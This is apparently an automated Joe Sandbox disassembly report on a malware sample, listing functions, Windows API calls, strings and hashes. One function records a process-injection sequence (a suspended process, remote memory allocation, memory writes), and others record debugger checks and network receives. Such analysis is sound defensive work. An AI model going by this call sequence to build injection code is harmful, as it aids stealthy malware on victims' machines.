Instruction ID: 56d018a058602c94d3b239c7a9df4e102ede44f6d298f7b34f227a9d3304a29b
Opcode Fuzzy Hash: baf9273f3ce57b6de155cd42d5114b6ed43218e24c72913c6c4809b9a202d775
Instruction Fuzzy Hash: 04114575A0420AAFCF0ADF58E9419DB7BF8EF49304F154069F808AB251D630EA11CBA4

Function 00323B48 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00323F38,?,?,00000000,?,00323F38,00000000,0000000C), ref: 00323B65

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: faf19986a710baa5ff8b9a553817a59153e64537329962dd15385f9df81d1b5a
Instruction ID: b12603670aa53f748cc9d3bcb5a36f34dfcea166c0d6492c3cff637b07ffa64f
Opcode Fuzzy Hash: faf19986a710baa5ff8b9a553817a59153e64537329962dd15385f9df81d1b5a
Instruction Fuzzy Hash: 3CD06C3200010DBFDF028F84DD46EDA3FAAFB48714F014000BA1856020C732E821AB90

Function 002E9ED0 Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(?,002F20A2,?,?,?,?), ref: 002E9ED9

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 90dec5ea8fa75b89c4d963be594c508cc4dca413200b869c7f1c665fdf2ac8fb
Instruction ID: f52840766c29e5df1ba4deba1a8f83f0f766042f508d30fa32601df3f68205b4
Opcode Fuzzy Hash: 90dec5ea8fa75b89c4d963be594c508cc4dca413200b869c7f1c665fdf2ac8fb
Instruction Fuzzy Hash: ABC0123006064056DE2CCE3A55481A53319A943395BEC068BD1324A0F5C3368897D750

Non-executed Functions

Function 003097DD Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003097E3
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003097F1
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00309802
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00309813
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00309824
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00309835
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00309846
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00309857
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00309868
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00309879
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0030988A
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0030989B
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003098AC
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003098BD
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003098CE
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003098DF
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003098F0
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00309901
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00309912
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00309923
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00309934
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00309945
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00309956
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00309967
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00309978
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00309989
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0030999A
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 003099AB
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 003099BC
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 003099CD
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 003099DE
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 003099EF
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00309A00
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00309A11
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00309A22
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00309A33
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00309A44
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00309A55
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00309A66
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00309A77
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00309A88

Strings

CreateThreadpoolWait, xrefs: 003098C3
GetTickCount64, xrefs: 0030994B
InitializeConditionVariable, xrefs: 0030998F
CreateSymbolicLinkW, xrefs: 0030992E
WakeAllConditionVariable, xrefs: 003099B1
TryAcquireSRWLockExclusive, xrefs: 003099F5
InitializeSRWLock, xrefs: 003099D3
GetLocaleInfoEx, xrefs: 00309A6C
GetSystemTimePreciseAsFileTime, xrefs: 0030997E
SubmitThreadpoolWork, xrefs: 00309A39
GetCurrentPackageId, xrefs: 0030993A
kernel32.dll, xrefs: 003097DE
FlsAlloc, xrefs: 003097EB
CreateSemaphoreW, xrefs: 0030985D
CreateEventExW, xrefs: 0030984C
SleepConditionVariableSRW, xrefs: 00309A17
SetFileInformationByHandle, xrefs: 0030996D
GetCurrentProcessorNumber, xrefs: 00309918
CreateThreadpoolTimer, xrefs: 0030987F
CloseThreadpoolTimer, xrefs: 003098B2
LCMapStringEx, xrefs: 00309A7D
FlsSetValue, xrefs: 00309819
WakeConditionVariable, xrefs: 003099A0
SetThreadpoolWait, xrefs: 003098D4
AcquireSRWLockExclusive, xrefs: 003099E4
FlsFree, xrefs: 003097F7
FlushProcessWriteBuffers, xrefs: 003098F6
CreateSemaphoreExW, xrefs: 0030986E
InitializeCriticalSectionEx, xrefs: 0030982A
ReleaseSRWLockExclusive, xrefs: 00309A06
GetFileInformationByHandleEx, xrefs: 0030995C
SetThreadpoolTimer, xrefs: 00309890
CloseThreadpoolWork, xrefs: 00309A4A
CreateThreadpoolWork, xrefs: 00309A28
InitOnceExecuteOnce, xrefs: 0030983B
WaitForThreadpoolTimerCallbacks, xrefs: 003098A1
FreeLibraryWhenCallbackReturns, xrefs: 00309907
CloseThreadpoolWait, xrefs: 003098E5
CompareStringEx, xrefs: 00309A5B
FlsGetValue, xrefs: 00309808
SleepConditionVariableCS, xrefs: 003099C2

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 1cb6e8acff7b7971aa5383ed67481d06cb56cf1930d1ca1b665b2519f18842ee
Instruction ID: 1b11a8f5a4c9f9d6f4474b3a9182337566971918cd12ee20598c40a9cadee52f
Opcode Fuzzy Hash: 1cb6e8acff7b7971aa5383ed67481d06cb56cf1930d1ca1b665b2519f18842ee
Instruction Fuzzy Hash: 2861A775956360AFCB0B6FB5AD8EA9B3AACBA0B743F14441AF101D6164DFF460C08F54

Function 002E8070 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 121memoryprocessthreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 002E809D
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 002E80FB
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 002E8114
GetThreadContext.KERNEL32(?,00000000), ref: 002E8129
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 002E8149
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 002E818B
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 002E81A8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 002E8261

Strings

VUUU, xrefs: 002E7F01
, xrefs: 002E8140
invalid stoi argument, xrefs: 002E8057

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
String ID: $VUUU$invalid stoi argument
API String ID: 3796053839-3954507777
Opcode ID: 863cc1b0e4a58bba263dc6b3938c8dbd4b105f3315c61443625ebd6f91d32bb2
Instruction ID: 8233e7c112e86e6bc6d64e5f4d41c7a68c9e534bb6a80c07183434bda5018a48
Opcode Fuzzy Hash: 863cc1b0e4a58bba263dc6b3938c8dbd4b105f3315c61443625ebd6f91d32bb2
Instruction Fuzzy Hash: 95416071684341AFD7219F61DC46F96BBE8BF88701F400419FB88DA1E0DBB0A954CB96

Function 00322E77 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003171C0: GetLastError.KERNEL32(?,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 003171C5
Part of subcall function 003171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 00317263

Part of subcall function 003171C0: _free.LIBCMT ref: 00317222
Part of subcall function 003171C0: _free.LIBCMT ref: 00317258

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00322F83
IsValidCodePage.KERNEL32(00000000), ref: 00322FCC
IsValidLocale.KERNEL32(?,00000001), ref: 00322FDB
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00323023
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00323042

Strings

a3, xrefs: 00322F30

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID: a3
API String ID: 949163717-654815084
Opcode ID: f57af26a4171f128d47f3d1efdddc38c71a06781bfeb4b7ee011791f783057e6
Instruction ID: db0ee24645fcb514ce1de220e00579c44e5d98266ff97a41002073e84328db67
Opcode Fuzzy Hash: f57af26a4171f128d47f3d1efdddc38c71a06781bfeb4b7ee011791f783057e6
Instruction Fuzzy Hash: 1E517D71A00225BFDB12DFA5ED85AFBB7B8AF08700F050469F904EB191EB7099448B61

Function 00324737 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1427COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 003248F3

Strings

1#INF, xrefs: 00325BEE
1#IND, xrefs: 00325BD0
1#SNAN, xrefs: 00325BDA
1#QNAN, xrefs: 00325BE4

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 41c31ba5d011717553328a0b6c49cca6cf5d9e6f03c1e03fd2ac35917db2d8bd
Instruction ID: ce16ad1ebd4207ba2db1f3fffff9b873f3229295ad742b29de01852b37fb8aa3
Opcode Fuzzy Hash: 41c31ba5d011717553328a0b6c49cca6cf5d9e6f03c1e03fd2ac35917db2d8bd
Instruction Fuzzy Hash: 24D22971E096288FDB66CE28ED407EAB7B9FB48305F1545EAD40DE7240E774AE818F41

Function 00322CA2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,00322FC0,00000002,00000000,?,?,?,00322FC0,?,00000000), ref: 00322D3B
GetLocaleInfoW.KERNEL32(00000000,20001004,00322FC0,00000002,00000000,?,?,?,00322FC0,?,00000000), ref: 00322D64
GetACP.KERNEL32(?,?,00322FC0,?,00000000), ref: 00322D79

Strings

OCP, xrefs: 00322CF6
ACP, xrefs: 00322CC0

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 62cd4219672e1c96cef0086f53cd093a68cc18fe2223cada5dfc8980ad1ca929
Instruction ID: d6b01a7ea23122765bdb0da473a39b4150ae36e40e544f1ae0a8163a915dbfa1
Opcode Fuzzy Hash: 62cd4219672e1c96cef0086f53cd093a68cc18fe2223cada5dfc8980ad1ca929
Instruction Fuzzy Hash: 8A21D032A00124BBDB378B24ED01B9BB3AAFB50B50F578024E91ADB214EB32DD41C390

Function 002E93D0 Relevance: 6.2, APIs: 4, Instructions: 181COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,AA6E0749,0000000F,00000000), ref: 002E944A

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 3db7bc54a1dddb7915f9bfcdaaeecc31d9068914829322d780044bc752784f16
Instruction ID: 204e24a5946fdd8aa60611436ef3f4042ea61f3a280beabc7e9395668aeffd8d
Opcode Fuzzy Hash: 3db7bc54a1dddb7915f9bfcdaaeecc31d9068914829322d780044bc752784f16
Instruction Fuzzy Hash: 0A61FAB0D502849BDF21AF66CD5A7ED7BB5EB02310F90029EE4059B3C2DB745AD48BC2

Function 0030A895 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0030A8A1
IsDebuggerPresent.KERNEL32 ref: 0030A96D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0030A98D
UnhandledExceptionFilter.KERNEL32(?), ref: 0030A997

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 3d4f7b54b9dd7aa0214a51fb4c8d3def3cf096bde02c83c82332293ff2162d51
Instruction ID: 8666a2dbde3b6a4182190b3a7eff3771d3cfecc9a9489d851e7e45e379d2815a
Opcode Fuzzy Hash: 3d4f7b54b9dd7aa0214a51fb4c8d3def3cf096bde02c83c82332293ff2162d51
Instruction Fuzzy Hash: F5311875E0631C9BDB21DFA4D9897CDBBB8BF08300F1041AAE50DAB290EB705A85CF45

Function 00322929 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 003171C0: GetLastError.KERNEL32(?,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 003171C5
Part of subcall function 003171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 00317263

Part of subcall function 003171C0: _free.LIBCMT ref: 00317222
Part of subcall function 003171C0: _free.LIBCMT ref: 00317258

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0032297D
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003229C7
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00322A8D

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: d9445d41178086a8754c42ef89710d6d1a4f067b5eb2c8c04355fcddfbd90387
Instruction ID: 766a8ca433b32f0fa62d77c3824e7e3b7726ddee7910e00c9cb1237cca758e92
Opcode Fuzzy Hash: d9445d41178086a8754c42ef89710d6d1a4f067b5eb2c8c04355fcddfbd90387
Instruction Fuzzy Hash: 3C618171A00127AFDF3A9F28EC82BBB77A8FF04300F154169E905DA685EB74D995CB50

Function 002F2710 Relevance: 4.6, APIs: 3, Instructions: 104networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00000004,00000000), ref: 002F275B
recv.WS2_32(?,?,00000008,00000000), ref: 002F2790

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 17bf8f40af5b575cd7a87231b5eb548b7e8e64bf5e765b13e5dad1d638266d49
Instruction ID: 362c56710cc82b2c0e75d7c89c10b900cdf097b98db8d5f6eb712c04a104a6bd
Opcode Fuzzy Hash: 17bf8f40af5b575cd7a87231b5eb548b7e8e64bf5e765b13e5dad1d638266d49
Instruction Fuzzy Hash: A231C47590020D9BD711CB68DC85BFBFBACEB0A764F140226E915EB2D1CB74AC058BA0

Function 0030F25D Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0030F355
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0030F35F
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0030F36C

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 8665484ee075649ed3c2253029024543abaa2ba008f5f8304040b2061677978b
Instruction ID: 87c0fd79abf10fbfe7b585533611de480cc4fd0c19ec495cc8973f45cd4aa497
Opcode Fuzzy Hash: 8665484ee075649ed3c2253029024543abaa2ba008f5f8304040b2061677978b
Instruction Fuzzy Hash: 5531C4749023189BCB22DF64D9897DDBBB8BF08310F5046EAE40CA7291EB749F818F45

Function 00322803 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003171C0: GetLastError.KERNEL32(?,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 003171C5
Part of subcall function 003171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 00317263

EnumSystemLocalesW.KERNEL32(00322929,00000001,00000000,?,-00000050,?,00322F57,00000000,?,?,?,00000055,?), ref: 00322875

Strings

W/2, xrefs: 0032284A

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID: W/2
API String ID: 2417226690-1283033290
Opcode ID: 409f4b79616ed8e9cd7596bd32071f92b9489d86b67bb9479e8c90453e5e80b2
Instruction ID: aeb774cfc0907cfe78eb1e3494d6d425bc36c159d1d38d9e28540dd5e4987463
Opcode Fuzzy Hash: 409f4b79616ed8e9cd7596bd32071f92b9489d86b67bb9479e8c90453e5e80b2
Instruction Fuzzy Hash: 5811293A200705AFDB199F79EC916BBB791FF80318B15483DEA4647640D771A842CB40

Function 00318DCE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00316122,?,20001004,00000000,00000002,?,?,0031572F), ref: 00318E02

Strings

`&0, xrefs: 00318DED

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: InfoLocale
String ID: `&0
API String ID: 2299586839-1385275834
Opcode ID: 309f0f05b251c7f719ef9f602a50094a5faa0f17e9346cd7d0ac48de302f91bb
Instruction ID: 7aee8726f5f7ec1f810ab43f02d206cb0eef187b8ceac6f5f92962f876b5b9e8
Opcode Fuzzy Hash: 309f0f05b251c7f719ef9f602a50094a5faa0f17e9346cd7d0ac48de302f91bb
Instruction Fuzzy Hash: EAE04F36540228BBCF172F61EC08EEE3F1AEF48761F154411FD0566260CF728961AAD9

Function 00313310 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

